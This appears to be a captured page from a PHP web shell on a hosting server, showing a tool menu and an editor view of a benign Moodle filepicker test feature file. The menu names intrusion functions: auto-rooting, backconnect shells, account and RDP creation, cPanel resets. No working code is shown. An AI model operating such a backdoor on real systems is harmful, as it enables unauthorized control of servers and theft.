Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.73
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
repository /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
behat_filepicker.php
20.04
KB
-rw-r--r--
cancel_add_file.feature
1.43
KB
-rw-r--r--
create_folders.feature
1.01
KB
-rw-r--r--
create_shortcut.feature
3.24
KB
-rw-r--r--
delete_files.feature
4.26
KB
-rw-r--r--
edit_file.feature
3.05
KB
-rw-r--r--
overwrite_file.feature
2.32
KB
-rw-r--r--
select_file.feature
3.83
KB
-rw-r--r--
zip_and_unzip.feature
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_file.feature
@core @core_filepicker @_file_upload Feature: Edit file feature In order to edit a file As a user I need to be able to select the file in filemanager and modify the file information Background: Given the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | @javascript Scenario: Select file from "Files" filemanager using "icons" view and edit the name Given I log in as "admin" And I follow "Manage private files" And I click on "Display folder with file icons" "link" in the ".filemanager" "css_element" And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I should see "empty.txt" in the ".fp-content .fp-file" "css_element" And I click on "//div[contains(concat(' ', normalize-space(@class), ' '), ' fp-file ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element" And I should see "Edit empty.txt" And I set the following fields to these values: | Name | empty_edited.txt | When I click on "Update" "button" Then I should see "empty_edited.txt" in the ".fp-content .fp-file" "css_element" And I should not see "empty.txt" in the ".fp-content .fp-file" "css_element" @javascript Scenario: Select file from "Files" filemanager using "list" view and edit the name Given I log in as "admin" And I follow "Manage private files" And I click on "Display folder with file details" "link" in the ".filemanager" "css_element" And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I should see "empty.txt" in the ".fp-content .fp-filename" "css_element" And I click on "//span[contains(concat(' ', normalize-space(@class), ' '), ' fp-filename-icon ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element" And I should see "Edit empty.txt" And I set the following fields to these values: | Name | empty_edited.txt | When I click on "Update" "button" Then I should see "empty_edited.txt" in the ".fp-content .fp-filename" "css_element" And I should not see "empty.txt" in the ".fp-content .fp-filename" "css_element" @javascript Scenario: Select file from "Files" filemanager using "tree" view and edit the name Given I log in as "admin" And I follow "Manage private files" And I click on "Display folder as file tree" "link" in the ".filemanager" "css_element" And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I should see "empty.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element" And I click on "//span[contains(concat(' ', normalize-space(@class), ' '), ' fp-filename-icon ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element" And I should see "Edit empty.txt" And I set the following fields to these values: | Name | empty_edited.txt | When I click on "Update" "button" Then I should see "empty_edited.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element" And I should not see "empty.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element"
Close